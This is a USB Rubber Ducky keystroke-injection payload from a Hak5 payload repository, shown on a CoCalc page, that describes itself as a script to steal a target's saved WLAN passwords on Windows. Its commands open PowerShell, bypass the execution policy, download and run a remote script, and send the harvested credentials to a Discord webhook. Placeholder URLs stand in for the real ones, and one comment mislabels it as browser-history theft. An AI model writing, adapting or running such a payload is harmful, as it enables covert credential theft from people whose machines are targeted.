Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/credentials/WLAN-Windows-Passwords/v.2.0_by_truelockmc/payload.txt
2971 views
1
REM ###################################################################
2
REM # |
3
REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration |
4
REM # Author : true_lock |
5
REM # Description: A script used to steal target WLAN Passwords. |
6
REM # Category : Credentials |
7
REM # Target : Windows 10-11 |
8
REM # Version : 2.0 |
9
REM # |
10
REM ###################################################################
11
12
REM Browser History to Discord Webhook
13
14
GUI r
15
STRINGLN powershell
16
STRINGLN Set-ExecutionPolicy Bypass -Scope Process -Force
17
18
REM Replace the example urls with your real ones
19
DEFINE #SCRIPT_URL https://example.com/script.ps1
20
DEFINE #WEBHOOK https://discord.com/api/webhooks/
21
22
REM Saved WiFi Info to Discord Webhook
23
STRINGLN $whuri='#WEBHOOK'; irm #SCRIPT_URL | iex
24
25
STRINGLN exit
26
27